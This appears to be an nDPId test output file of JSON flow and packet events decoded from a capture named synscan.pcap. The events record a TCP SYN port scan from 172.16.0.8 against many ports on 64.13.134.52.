-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsyUAAADAGTzKsEAAIQA2GNIzSCEndUoMYAAAAAGACBAAsRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsBxkAACgGGVqsEAAIQA2GNIzSFtrdUoMYAAAAAGACBAAdtQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAs6FYAADkGJxysEAAIQA2GNIzSHVjdUoMYAAAAAGACCAATNwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsEFQAADgGAB+sEAAIQA2GNIzSBEjdUoMYAAAAAGACBAAwRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAso8IAACoGerCsEAAIQA2GNIzTJATdU4MZAAAAAGACDAAIiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpQAADUG6N6sEAAIQA2GNIzTBJHdU4MZAAAAAGACCAAr+wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsqggAADYGaGqsEAAIQA2GNIzTKUbdU4MZAAAAAGACDAADRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsvOQAACoGYY6sEAAIQA2GNIzTBuHdU4MZAAAAAGACDAAlqwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNoAADYG\/ZisEAAIQA2GNIzTAAPdU4MZAAAAAGACDAAsiQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKEAAC8GrNGsEAAIQA2GNIzTBSrdU4MZAAAAAGACEAAjYgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsohQAACYGgF6sEAAIQA2GNIzTIAHdU4MZAAAAAGACDAAMiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsrJgAADMGaNqsEAAIQA2GNIzTEdfdU4MZAAAAAGACEAAWtQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsOqsAADkG1MesEAAIQA2GNIzTTj\/dU4MZAAAAAGACCADiTAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsfAoAACkGo2isEAAIQA2GNIzTJxDdU4MZAAAAAGACCAAJfAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAADoGDTOsEAAIQA2GNIzTJMrdU4MZAAAAAGACDAAHwgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsEygAADoG+0qsEAAIQA2GNIzTBrfdU4MZAAAAAGACDAAl1QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsokMAADcGby+sEAAIQA2GNIzTCPDdU4MZAAAAAGACEAAfnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6UAAC0GU82sEAAIQA2GNIzTFxLdU4MZAAAAAGACCAAZegAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsiMQAADcGiK6sEAAIQA2GNIzSG7zdUoMYAAAAAGACEAAM0wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfcAADsGb3usEAAIQA2GNIzSDwvdUoMYAAAAAGACEAAZhAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAspuwAAC8GcoasEAAIQA2GNIzSJ8TdUoMYAAAAAGACEAAAywAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAszy0AACkGUEWsEAAIQA2GNIzSG1ndUoMYAAAAAGACCAAVNgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsh1cAADAGkRusEAAIQA2GNIzSEWHdUoMYAAAAAGACBAAjLgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswFUAACcGYR2sEAAIQA2GNIzS1DjdUoMYAAAAAGACEABUVgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACoGCumsEAAIQA2GNIzSAFPdUoMYAAAAAGACDAAsPAAAAgQFtA=="} 